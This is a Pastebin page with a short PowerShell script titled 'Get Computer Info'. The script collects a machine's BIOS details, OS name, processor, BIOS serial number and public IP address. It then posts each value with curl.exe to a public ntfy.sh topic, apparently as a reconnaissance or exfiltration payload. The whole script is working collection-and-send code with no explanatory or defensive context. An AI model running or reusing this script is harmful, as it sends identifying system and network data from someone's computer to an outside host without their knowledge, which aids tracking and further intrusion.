Advertisement
unzvqxnnfuvs

Get Computer Info

Aug 25th, 2024 (edited)
298
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PowerShell 0.38 KB | Source Code | 0 0
  1. $n = Get-ComputerInfo
  2. curl.exe http://ntfy.sh/unzcomin -d $n.bioscaption
  3. curl.exe http://ntfy.sh/unzcomin -d $n.osname
  4. curl.exe http://ntfy.sh/unzcomin -d $n.cssystemfamily
  5. curl.exe http://ntfy.sh/unzcomin -d $n.csprocessors.name
  6. $sn = wmic bios get serialnumber
  7. curl.exe http://ntfy.sh/unzcomin -d $sn[2]
  8. $ipin = curl.exe ipinfo.io/ip
  9. curl.exe http://ntfy.sh/unzcomin -d $ipin
  10. exit
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement